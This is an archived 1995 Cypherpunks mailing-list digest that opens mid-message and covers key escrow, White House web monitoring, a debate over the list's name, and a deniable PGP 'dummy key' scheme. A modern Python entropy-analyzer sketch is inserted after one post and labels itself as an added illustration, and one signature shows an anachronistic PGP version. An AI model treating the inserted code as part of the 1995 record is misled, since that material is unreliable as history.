>people using crypto among themselves" run  completely 
>counter to all the hyperbole about terrorists planning 
>OKC II  with PGP ?  Does anyone have an exact quotation 
>?  At any rate, sign me up as  a "bad person"....


   "Bad people" is my euphemism for Mr. Nelson's "terrorist" 
   -- which brought snorts from the audience.

   Yes, his statement about not being concerned with crypto
   use among terrorists was surprising.

   On a verbatim transcript: Mr. Ed Roback of NIST, the KE
   meet director, said that a complete transcript of the
   proceedings will not be published, only a summary report at
   some point, and then, after the September 15 session,
   some version will appear in the Federal Register for public
   comment.

   The summary report should appear eventually at the NIST web
   site -- the CSSPAB site has reports for prior KE sessions
   in the annual reports.

   See <http://csrc.ncsl.nist.gov/csspab/94-rpt.txt> for 1994,
   and similar for earlier years, on key escrow documents.

   To amplify what Tim said, the CSSPAB site has very
   interesting docs.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 13 Sep 95 06:03:12 PDT
To: cypherpunks@toad.com
Subject: Scientology tries to break PGP - and
Message-ID: <Pine.A32.3.91.950913085122.47812A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Tue, 12 Sep 1995, S. Keeling wrote:

> 	I would just like to point out that, when a LEA comes to you
> to get at the contents of your computer, (s)he is not going to
> patiently wait while your system wipes the offending evidence off your
> hard disk.  The first thing they do is make a copy of everything, so
> they can work from the copy.  Besides, you do have backup tapes laying
> around all over the place, don't you?

Actually, I have *everything* laying around all over the place but I 
suppose that's off-topic.

They have to decrypt the file sometime if they want its "contents".

I use the -w option when encrypting.  After encryption, the "dummy" file
(would be) embedded and the plaintext is wiped.  The only "secret" key 
is the "fake" key.  The "real" key is under the blender in the kitchen.  
(If I get busted and they search under the blender I will write back if 
I'm in a position to do so.  Not that I have anything to get busted for 
of course. :)  Don't back up plaintext and what is the problem here?  
Where will they get the "real" data from?  What does it matter where the 
decryption takes place?  And no, I don't have backup tapes laying around; 
I use a Zip Drive!  :-)

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Sep 95 00:10:27 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on GAK
In-Reply-To: <199509111316.JAA02859@pipe2.nyc.pipeline.com>
Message-ID: <199509130710.JAA26140@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> wrote:

>       It's a good thing the administration only wants to outlaw
> cryptography, not anonymity.

But you can't have strong anonymity without strong cryptography.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 06:30:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: (NOISE) Re: White House MONITORS Web Pages !
In-Reply-To: <8B10180.000504F829.uuout@the-matrix.com>
Message-ID: <9509131330.AA25431@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is NOISE !

DAMION FURI writes:
>         Maybe so, but we don't have to like it.  And I don't.  But
>         it's not so much their access, per se, that I object to.

Why the hell do you care ?  Someone has a home page for something on the Web.
Someone at the White House looks at it. So what ?  You object to the fact
that somebody in the government has a Web browser and *gasp* uses it to read
stuff on the WWW ???
  
>	It's their potential intentions, 

You take moral offense to what you think someone else _might_ be thinking ?  
Sounds like you believe in thoughtcrime. Banned any good books lately ?

> 	all things considered, and
>         the fact that they aren't at all open about such monitoring.

This is absurd. You expect the White House to issue a press release every time
a staffer clicks on a URL ?  

	"WASHINGTON (UPI) The Clinton Administration unveiled plans today to
	add several new sites to the White House bookmarks list. At a hastily
	arranged press briefing this morning, Defense Secretary William Perry 
	told reporters that the changes would be implemented in close 
	consultation with NATO allies. There was little immediate reaction 
	from Capitol Hill. Members on both sides of the aisle said they 
	needed time to study the proposal in detail."

Someone please tell me this is just an extremely premature April Fool's joke...

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 13 Sep 95 06:33:14 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <199509131332.JAA29256@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Henry W. Farkas <hfarkas@ims.advantis.com> writes:
>On Tue, 12 Sep 1995, S. Keeling wrote:
>
>> 	I would just like to point out that, when a LEA comes to you
>> to get at the contents of your computer, (s)he is not going to
>> patiently wait while your system wipes the offending evidence off your
>> hard disk.  ...
>> they can work from the copy.  Besides, you do have backup tapes laying
>> around all over the place, don't you?
>
>They have to decrypt the file sometime if they want its "contents".
>
>I use the -w option when encrypting.  After encryption, the "dummy" file
>(would be) embedded and the plaintext is wiped.  ...

And the idea is that on decrypting with the 'wrong' key, it outputs the
dummy file rather than the real plaintext, correct?

>          ...  Don't back up plaintext and what is the problem here?  
>Where will they get the "real" data from?  What does it matter where the 
>decryption takes place?  ...

Why would they use your copy of the program to decrypt the file?  They
could just use a version that lacked this 'feature'.  Of course, they
still couldn't get at the real plaintext unless you gave them the key,
but you are right back to the same old standoff where they say, "Give
us your key," and you (try to) say, "No."

--
David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 13 Sep 95 07:57:34 PDT
To: trei@process.com
Subject: CYPHERPUNK considered harmful.
In-Reply-To: <9509131434.AA23717@toad.com>
Message-ID: <9509131453.AA31340@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Some comments (and note that I've just cleaned my white board, so I
may not be thinking too rationally):

Peter Trei writes:
 >      "Strong cryptography is a powerful new technology, of which the
 > widespread and unfettered use should be encouraged."
 > 
 >      Our error lies in our approach to encouraging the widespread use of
 > crypto. It is an error of hubris - overweening pride.

Hmm...  I don't think I completely agree with this; on the contrary,
the "senior members" of the list seem generally quite open and
understanding of the issues re cryptography for the general public.

 >      We too often think of ourselves as an elite - smarter and better in
        ^^ [ careful here... ]
 > various ways to our non-cpunk neighbours. We refer to these others as
 > 'Joe Sixpack' and other such derogatory terms. 
 >
 >      The problem is that in doing so we are marginalizing ourselves. 
 > 
 >      We call ourselves 'cypherpunks'. While this is derived from the SF
 > term 'cyberpunk', consider the image we are creating for ourselves:
 > 
 >      A 'punk' is a marginalized young adult, one who rejects the norms
 > of his or her society, and takes delight in irking those around him with
 > his or her rejection. The older of us will think of James Dean in 'Rebel
 > Without a Cause', or Brando in 'The Wild One'. Later, you get images
 > such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
 > other icons of the 'punk rock' movement.

I actually consider this a feature.  With a "straight" name for the
organization, like "International Cryptographic Interest Society" or
something, we run the risk of being co-opted into the "mainstream"
without even realizing it.

There's nothing wrong with being a punk, remember.  That the word is
weighted simply means that people have to overcome prejudice.  Indeed,
much of the motivation for boosting cryptography is to protect the
rights of every individual to opt out of conformity.  If everyone
were normal & mainstream, who'd care about hiding anything?  What's to
protect?

 >     These punks are often romantic figures, but in reality they started
 > marginalized, remained marginalized, and died marginalized. They were
 > ineffective in changing the core values of the society ...

Whoooa there; can you really say that?  Can you really say that as
society absorbs marginalized fragments of the culture that there's not
a significant adjustment?

In 1955, if I walked down the street with tousled hair, a white
t-shirt covered by a ratty leather jacket, and messy jeans, I'd be an
"obvious" criminal delinquent; now, I'd be in a Calvin Klein ad.
There's certainly a profound effect on culture wrought by the mere
existence of fringe groups, particularly if the groups can gain access
to media.

 >     We, the 'cypherpunks' have embraced this label, taking pride in our
 > technical abilities, and acting as if we can institute 'cryptoanarchy'
 > without getting a majority of the population to support us.

I think again that this is a generalization over the membership.  Some
do feel that way, and some don't; I think what you said above about
the uniting factor of wanting to see cryptography popularized is
accurate, and that's the theme that binds us together (if anything
does).

 >     This is a bad approach. The overwhelming majority of the US
 > population is not alienated from the US government, and regards with
 > suspicion those who are.

I wonder about that assertion.

 >      I suggest that we drop the term 'cypherpunk' - it has the wrong
 > connotations to get our ideas into the mainstream. I don't have a 
 > perfect replacement yet:
 > 
 > 1. I want to get away from the strings 'crypt' and c[iy]pher- they sound
 > too cloak-and-dagger.

That idea seems pretty much a fundamental one to be attacked in any
effort to popularize cryptography.

 > 2. It should imply that the labelees are level-headed, responsible
 > citizens, not longhaired weirdos.

Again, I think that making a strong statement every time the name of
the organization has to be read aloud by a newscaster is a feature.

 > 3. It should make itself difficult to invert - the classic example
 > is the pro-choice/pro-life dichotomy, where each side refuses to
 > acknowledge the other's terminology.

Is "cypherpunk" invertible?

 > 4. A cute and apropos acronym would help.

...  Sorry, I have to quit now; I need to borrow a fan before the
fumes knock me out.

In summary, I think your concerns are valid, but I'd hesitate to do
something radical like change the list name.  After all, think of all
the mail filter files that'd have to be fixed :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 13 Sep 95 07:12:24 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <199509131412.KAA26837@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 PM 9/12/95 -0400, Brian Davis wrote:

>Unbelievable!!!  To add to this distressing truth, I have learned that 
>the White House also subscribes to a number of newspapers and periodicals 
>which are reviewed for things of interest to the Administration and to 
>the President. I I I I I I ammmmmmmmmm shocked!

The government, as you no doubt know, sometimes operates under different
rules.  Thus when the "Red Squad" (Intelligence Division) of the New York
City Police (located in that big building on the North side of Vandam
between Greenwich and Houston BTW) was sued for maintaining files on "lawful
protest groups" they entered into a consent agreement to refrain from this
sort of thing.  Later, the courts said that this agreement meant that the
cops couldn't even listen to WLIB radio (NYC's favorite radical
African-American station) to find out in advance where rallies were going to be.

Since the White House is doing this reading of sites with public funds and
since that institution is the most powerful in the world --- it can nuke its
enemies, for example --- people are naturally interested to discover if they
are the subject of an investigation.

This is a demonstration of the unintended effect of electronic surveillance
technology.  The fact is that it can do more harm to the authorities than to
the public.  The Nixon Tapes/The Thompson Square Park Riot Video/The Rodney
King Video.  Since those in power are more interesting than ordinary people,
they represent a more "target-rich environment."  Information about their
activities has greater commercial value and is thus more likely to see the
light of day.

DCF

"There are more of us than there are of you."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 13 Sep 95 07:17:23 PDT
To: hallam@w3.org
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130226.AA22319@zorch.w3.org>
Message-ID: <199509131416.KAA06476@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phill wrote:

| If we are serious about privacy I think we should be very clear that
| we respect the privacy of Whitehouse staffer and staffers in the
| Senate and House. I'm not being partisan about this, I have put a
| lot of effort into getting participation from the right as well as
| the left. I've just not been very successful in that area.


	Sure.  I'll respect their privacy as much as they, and the
organizations they oversee, respect mine.  I'll use as the
representative organizations the IRS and the Social Security
Administration, which respects my privacy so much that they use
prison inmates to process paperwork.

	If I was in a nasty mood, I'd add the USPS.

	Sarcasm aside, they show no interest in other people's
privacy.  Why should we go out of our way to do anything but show them
how bad the situation is?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Wed, 13 Sep 95 10:21:27 PDT
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: Scientology tries to break PGP - and
In-Reply-To: <Pine.SOL.3.91.950913163953.25308J-100000@eagle.nexor.co.uk>
Message-ID: <Pine.OSF.3.91j.950913101455.27871A-100000@saul4.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Andy Brown wrote:

> On Wed, 13 Sep 1995, Henry W. Farkas wrote:
>  
> > If decrypted with the "alternate" or "fake" secret key, the encrypted file
> > is wiped until it reaches a marker; the remainder of the file is
> > displayed.  If you use your "primary" or "real key", the extraneous text
> > is simply stripped.
> 
> Useless I'm afraid.  They have the source code and have disabled your
> "feature" and attached loud alarm bells to it.
> 

I don't see what's wrong with removing any checking done by PGP.
(ie don't keep a checksum or whatever) After all, they can't prove
that you didn't just encrypt a pgp +makerandom file.

Obviously, I would not want to use this "feature" in some cases,
so make adding a checksum be an extra command line option.

The new feature would of course not be backwards compatible, but
there is no way to disable the "feature" and no way to attach
loud alarm bells.

Of course, you are then faced with giving them a key which you know
will decrypt the file to gibberish. Ideally, you would steno the 
encrypted file.

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+---- Random Thought ------------------------------------------------------+
|I conducted an experiment to test Murphy's Law, but everything went wrong.|
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 10:16:23 PDT
To: cypherpunks@toad.com
Subject: Can GAK be made "not interoperable" with PGP?
Message-ID: <ac7c5e4817021004ba64@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:34 PM 9/13/95, Hal wrote:

>I think this is setting up the rationale for software key escrow.  One of
>the big loopholes in this idea has always been that it would be easy for
>bad guys to superencrypt or otherwise bypass the legal encryption.  The
>response has been that the systems will be designed so that compliant
>systems will not interoperate with rogue systems.  And the counter-response
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>to that was that criminals (and privacy advocates) would use software
>which would operate compliantly with conventional programs and maintain
>privacy when talking to other rogue programs.

But is this even possible, to make a GAK system "not interoperable" with,
say, PGP?

Unless the GAK system has some sort of entropy analyzer, and can recognize
high-entropy sources which it presumes to be encrypted data (*), one can of
course PGP-encrypt a text file and then GAK the resulting file.

Many of us are already using PGP mostly in this way, i.e., writing files in
text editors, PGP-encrypting and getting an ASCII file back, and then
sending. GAK will still have to deal with this mode.

(* On the idea of entropy analyzers. This is implausible, for many reasons.
Any high-entropy file could have the entropy reduced by padding with
low-entropy sources. And there would be "false positives." Some ostensibly
plaintext posts are so incoherent (;-}) they might be "rejected" by such a
GAKalyzer.)

So, is any conceivable GAK escrow system possible that cannot be used with
other crypto programs? Text is text, unless the GAK program purports to
accept or reject the text based on entropy considerations. And I can't
imagine that part of the GAK program would be robust against hacking.

>This new line will be used to respond to this argument, I think.  Even if
>it is admitted that there is no way for the government to be able to tell
>what the criminals say amongst themselves, it will still be useful to be
>able to tell what they say to other people.  Therefore software key
>escrow will be argued to still be useful even though it can be defeated.

But such traffic analysis is made moot by remailers, as we all know.

What I think we may be facing, if the folks pushing GAK are really serious
about all this, are restrictions on *who we may mail to*!!! For if Alice is
"allowed" to send a message, GAKked or not, to a remailer....

(I can speculate about laws saying only "internationally registered" sites
can use e-mail, but this seems impractical in the extreme...lots of
issues.)

The GAK advocates need to realize that superencryption will be as easy as
it is today to use PGP, and that even traffic analysis will be defeated if
remailers are used.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
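
The entropy-analyzer footnote in the message above, worked through as an added sketch (not code from the thread, nor from PGP or any escrow product): a byte-entropy check flags base64-armored ciphertext, misses the same armor once it is padded with prose, and raises a false positive on a harmless encoded table. It goes one step past the message by adding a sliding-window scan, which still catches a contiguous armored block. The 5.5 bits-per-byte threshold, the 256-byte window, the sample prose, and the SHA-256 counter-mode stand-in for ciphertext are all assumptions.

```python
import base64
import hashlib
import math
from collections import Counter

# Assumed cut-off in bits per byte: base64 text tops out at 6.0, while the
# lowercase sample prose below (at most 30 distinct bytes) stays under 4.91.
THRESHOLD = 5.5
WINDOW = 256  # assumed window size for the sliding scan
STEP = 64     # assumed stride between windows

# Constructed sample prose: lowercase letters, space, comma, period, newline.
PROSE = (
    "many of us already write a message in a text editor, encrypt it, and "
    "paste the armored result into ordinary mail. the escrow layer then sees "
    "only text, and text is text unless something inspects its statistics.\n"
).encode()


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte histogram, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pseudo_ciphertext(n: int) -> bytes:
    """Constructed stand-in for ciphertext: SHA-256 in counter mode.

    Deterministic, so the example is reproducible. Not real PGP output.
    """
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(b"constructed" + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:n])


def armor(data: bytes) -> bytes:
    """Base64 text standing in for PGP ASCII armor (no headers, no CRC)."""
    return base64.b64encode(data)


def flagged_whole(msg: bytes) -> bool:
    """Whole-message check: one histogram over the entire message."""
    return shannon_entropy(msg) >= THRESHOLD


def flagged_window(msg: bytes) -> bool:
    """Sliding-window check: flag if any window reaches the threshold."""
    last = max(1, len(msg) - WINDOW + 1)
    return any(
        shannon_entropy(msg[i:i + WINDOW]) >= THRESHOLD
        for i in range(0, last, STEP)
    )


def build_samples() -> dict:
    """Four constructed messages covering the cases the footnote raises."""
    blob = armor(pseudo_ciphertext(384))
    return {
        # Ordinary text: should pass.
        "prose": PROSE * 20,
        # Armored ciphertext on its own: should be flagged.
        "armored": armor(pseudo_ciphertext(3072)),
        # The same kind of armor buried in low-entropy padding.
        "padded": PROSE * 40 + blob + b"\n" + PROSE * 40,
        # Not encrypted at all: a byte-value table, base64-encoded.
        "lookup_table": armor(bytes(range(256)) * 12),
    }


def survey() -> dict:
    """Map sample name to (entropy, whole-message flag, window flag)."""
    return {
        name: (round(shannon_entropy(m), 3), flagged_whole(m), flagged_window(m))
        for name, m in build_samples().items()
    }


if __name__ == "__main__":
    for name, (h, whole, window) in survey().items():
        print(f"{name:13s} H={h:5.3f}  whole={whole!s:5s}  window={window}")
```
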






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 13 Sep 95 07:34:42 PDT
To: cypherpunks@toad.com
Subject: CYPHERPUNK considered harmful.
Message-ID: <9509131434.AA23717@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I mailed this yesterday, but it never showed up on the list.

-----BEGIN PGP SIGNED MESSAGE-----


V Z Nuri has actually stolen my thunder a bit here, with his post on
'crypto confrontation', but I've been working on this stuff since
Friday. I have a somewhat different approach, and I'd like to see
some comment.


                  "CYPHERPUNK" considered harmful

     I would like to propose that we, the 'cypherpunks', are making a
strategic error, which will make it far more difficult to achieve the
goal we share.

     I realize that many will bridle at the notion that we have a common
goal, but I think that most of the participants in this list will agree
with the following:

     "Strong cryptography is a powerful new technology, of which the
widespread and unfettered use should be encouraged."

     Our error lies in our approach to encouraging the widespread use of
crypto. It is an error of hubris - overweening pride.

     We too often think of ourselves as an elite - smarter and better in
various ways to our non-cpunk neighbours. We refer to these others as
'Joe Sixpack' and other such derogatory terms.

     The problem is that in doing so we are marginalizing ourselves. 

     We call ourselves 'cypherpunks'. While this is derived from the SF
term 'cyberpunk', consider the image we are creating for ourselves:

     A 'punk' is a marginalized young adult, one who rejects the norms
of his or her society, and takes delight in irking those around him with
his or her rejection. The older of us will think of James Dean in 'Rebel
Without a Cause', or Brando in 'The Wild One'. Later, you get images
such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
other icons of the 'punk rock' movement.

    These punks are often romantic figures, but in reality they started
marginalized, remained marginalized, and died marginalized. They were
ineffective in changing the core values of the society in which they
lived (yes, I know that most of the examples I've given are fictional
characters, but I'm talking about the type of people they are modeled
on).

    We, the 'cypherpunks' have embraced this label, taking pride in our
technical abilities, and acting as if we can institute 'cryptoanarchy'
without getting a majority of the population to support us.

    This is a bad approach. The overwhelming majority of the US
population is not alienated from the US government, and regards with
suspicion those who are.

     I suggest that we drop the term 'cypherpunk' - it has the wrong
connotations to get our ideas into the mainstream. I don't have a 
perfect replacement yet:

1. I want to get away from the strings 'crypt' and c[iy]pher- they sound
too cloak-and-dagger.

2. It should imply that the labelees are level-headed, responsible
citizens, not longhaired weirdos.

3. It should make itself difficult to invert - the classic example
is the pro-choice/pro-life dichotomy, where each side refuses to
acknowledge the other's terminology.

4. A cute and apropos acronym would help.

     Many on this list have been advocating cryptography primarily as a
means of liberating ourselves from an intrusive and overcontrolling
state. This is a goal that leaves most Americans cold - they correctly
regard their country as one of the most free in the world, and are
alarmed by people who want major changes in the status quo.

     To get crypto accepted into the mainstream, we need to make it
something the average person expects and wants to use, for goals
that make mainstream sense - not for some distant, idealist utopian
cryptoanarchic libertarian dream.

     Crime is a major political hot button these days. Advocating 
crypto for preventing crime is probably the best approach we have
to getting the meme into the mainstream's ear that "I need good
crypto".


- --------------------------------------------------------------

     Towards this goal, I have written a short Q&A that could be
used as a model when discussing cryptography with non-cypherpunks.
These are UNFINISHED DRAFTS. I would welcome additions, corrections,
completions, and modifications. Please do NOT repost to other 
locations until they are finished.

     I'm trying to avoid wild anti-state tirades, giving mainstream
reasons for people to take pro-cryptography positions.

- -------------------------------------------------------------


Q: Why should I use cryptography?

A: To protect yourself against crime. Criminals have already been
caught installing "sniffers" on the Internet, and capturing passwords
and other data. Cryptography will protect you from this. It will also
protect your company against industrial espionage, and reduce fraud by
providing unforgeable and undeniable digital signatures. 

Cell phone companies currently pay $XXXX million every year due to
cellular fraud. This vast level of crime could be reduced to near zero
by cryptography, with a corresponding reduction in cellular rates. On
top of this, a great deal of crime is committed by tapping cell phone
conversations - something that can be done by any teenager (or gangster)
with a simple scanner. Even the British royal family have had their 
privacy invaded by this method. Encryption can protect your phone
conversations, and make them as private as regular phones. Finally,
strong encryption can make the Internet safe for commerce and trade.

[We need more data on the 'sniffer' attacks which have occurred - I know
there was one on BARRNET about a year ago, and I understand that there
have been others].


Q: Won't criminals be able to evade wiretaps by encryption?

A: In theory they could. However, the FBI has not reported a single case
where cryptography has been a barrier to wiretaps [I think this is
correct - any counters?]. It turns out that criminals have not been
using strong cryptography. Even if they did start to do so, audio and
data bugs can still be planted.

Criminals *have* been tapping the unencrypted data that flows through
and is stored on the Internet, and tapping cell phone transmissions to
commit cellular fraud. Encrypting your data and communications will help
protect you against them.


Q: Aren't LEAs worried that strong encryption will make it more
difficult for them to catch crooks?

A: There's an old saying that's apropos here: "When you're up to your
ass in alligators, it's easy to forget that you're trying to drain the
swamp."

The reason we have LEAs is not to catch crooks; their purpose is to
prevent crime. Catching crooks is simply one method of doing so.
Cryptography provides a method of preventing crime before it happens,
and putting the crooks out of business. 

To give a couple of analogies: 

1. If your house was strongly built, and no one could enter without your
consent, you would not worry about burglary. If every house was
similarly robust, burglars would be out of a job.

2. Similarly, if your car could not be broken into, damaged, or moved in
any way without your cooperation, you would not worry about car theft,
or pay for theft insurance. If all cars were similarly protected, car
theft and carjacking would no longer exist as crimes.

LEAs tend to focus on the small number of investigations which may be
hampered by good cryptography, ignoring the vast number of crimes which
would be prevented by the same technology. This is a classic example of
failing to see the forest for the trees. The widespread use of
cryptography would reduce crime to a point where many LEA employees
could retire.


Q: What's this 'key escrow' thing? 

A: Some government agencies have been trying to figure out methods which
simultaneously permit US citizens to use strong cryptography against
criminal eavesdroppers, while retaining the ease with which LEAs can
currently tap your calls. The schemes generally involve something
mistitled 'key escrow', in which copies of cryptographic keys would be
stored at sites accessible by LEAs.

Q: Why do you object to it?

A: This is a bit as if your local police department ordered you to send
them copies of all of your house, car, and office keys, so that they
could enter whenever they felt it warranted, without your knowledge.

Even assuming no keys will be leaked to criminals from such a valuable
archive, it's an incredible boondoggle. The initial cost is tens of
millions of dollars per year, by the most conservative government
estimates. In reality, it's likely to be hundreds of millions a year,
all to enable LEAs to investigate a type of crime which does not yet
occur, and may never occur.

Q: But isn't escrow required only for export

[like I said, I haven't finished]

- ------------------------------------------------------
Cute signature quotes are needed.

example:

 I lock my house. Don't you? I lock my car. Don't you?
 I lock my data.  Do you?  Use cryptography to protect
 yourself against crime.

- ------------------------------------------------------
Up to this point, I've been an advocate of crypto
without using it for much of anything - a classical
case of 'I don't have anything that needs it'.

I'm going to start clearsigning my messages with PGP.
My new key <ptrei@acm.org> is included here, and has been
put on the MIT server. No signatures yet (sorry I didn't 
get together with Perry in Danvers).

Here's my key:


KeyId           = DEF6CF15
Key fingerprint =  07 4A 45 4E 09 F8 30 1F  78 97 AD 18 24 4E 19 E3

I'm signing this with 'pgp -sta' on a Windoze NT machine. Could 
someone check the sig and tell me if it computes?

Thanks,

Peter Trei

- -------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFXLXFQxhKXe9s8VAQEhewP9GFus8GXNygG3rjQqrx1uIW6Cb2QxtMZG
igKwDaSZQpp3a9Q8oQfSCbK6da6TotOOSZhI9EYG6Es31eoDhyomn2HR/Bompocl
hmkQgMqasJW37Rs1/Vw4uBfdoq0o0FiC8jLkvSj7j+pDP6FB890pWzTtEJ+t+Hqd
au6NALhGo14=
=jTar
-----END PGP SIGNATURE-----

gah - pgp has munged the dashed lines for the pubkey. Here it is again:



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 13 Sep 95 07:46:06 PDT
To: "David R. Conrad" <ab411@detroit.freenet.org>
Subject: Re: Scientology tries to break PGP - and
In-Reply-To: <199509131332.JAA29256@detroit.freenet.org>
Message-ID: <Pine.A32.3.91.950913102622.32299A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Sep 1995, David R. Conrad wrote:

> And the idea is that on decrypting with the 'wrong' key, it outputs the
> dummy file rather than the real plaintext, correct?

I'll say it again.  :-)

PGP could allow for an alternate secret key and a standard "dummy"
document from somewhere in your path.  A command line option would encrypt
for both keys (as if there were 2 recipients) and append the "dummy"
document to the end of the target file when encrypting. 

If decrypted with the "alternate" or "fake" secret key, the encrypted file
is wiped until it reaches a marker; the remainder of the file is
displayed.  If you use your "primary" or "real key", the extraneous text
is simply stripped. 

Alternately, the "dummy" file could overwrite the "real" message n times, 
to keep the decrypted file size more realistic.

> Why would they use your copy of the program to decrypt the file?  They
> could just use a version that lacked this 'feature'.

A good point.  A new version of pgp would have to be incompatible with 
older versions.  That's a Very Big Hassle, I know.  But consider the 
advantage.  Nobody who has your secure key can prove that it's not the 
"real" secure key and that the decrypted file is not the real plaintext.  
They may "know" it but they can't prove it.  All they can do is force you 
to hand over *-a-* key that will decrypt the file. 

> Of course, they
> still couldn't get at the real plaintext unless you gave them the key,
> but you are right back to the same old standoff where they say, "Give
> us your key," and you (try to) say, "No."

Well yes, that is the point I'm trying to address.  The key you finally
give them *is* your secure key.  Just not the key under the blender.  They
will have a hard time arguing "But that's not what the file *really* said
and, deep inside of me, I know it!".  

I say again:  All they can do is force you to hand over *-a-* key that will
decrypt the file.  "You cannot force a mind." - J. Galt -

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
